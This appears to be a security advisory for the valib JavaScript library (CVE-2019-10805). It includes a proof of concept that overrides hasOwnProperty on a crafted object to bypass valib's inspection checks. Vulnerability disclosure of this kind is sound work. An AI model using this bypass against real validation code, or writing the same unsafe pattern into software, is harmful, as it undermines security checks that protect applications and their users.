Internal Property Tampering

Affecting valib package, ALL versions

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

valib is an A standalone javascript library tailored for validation.

Affected versions of this package are vulnerable to Internal Property Tampering. A maliciously crafted JavaScript object can bypass several inspection functions provided by valib. Valib uses a built-in function (hasOwnProperty) from the unsafe user-input to examine an object. It is possible for a crafted payload to overwrite this function to manipulate the inspection results to bypass security checks.

PoC by Feng Xiao (xiaofen9)

"use strict";
var valib = require('valib');
var json = {
    key1: null,
    key2: {
        url: "http://example.com"
    },
    key3: "17850",
    key4: "OK",
    key5: "2012-10-06T04:13:00+00:00",
    key6: [1, 2, 3],
    key7: "Yes"
};
json.hasOwnProperty = function(val) {return false;}
function test(userJson){
    console.log(valib.Object.isEmpty(userJson));
    console.log(valib.Object.countKeys(userJson));
    console.log(valib.Object.hasValue(userJson, "Yes"));
}
test(json);

Remediation

There is no fixed version for valib.

References

CVSS Score

7.5
high severity
  • Attack Vector
    Network
  • Attack Complexity
    High
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Changed
  • Confidentiality
    Low
  • Integrity
    High
  • Availability
    None
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N/E:P/RL:U/RC:C
Credit
Feng Xiao (xiaofen9)
CVE
CVE-2019-10805
CWE
CWE-642
Snyk ID
SNYK-JS-VALIB-559015
Disclosed
28 Feb, 2020
Published
28 Feb, 2020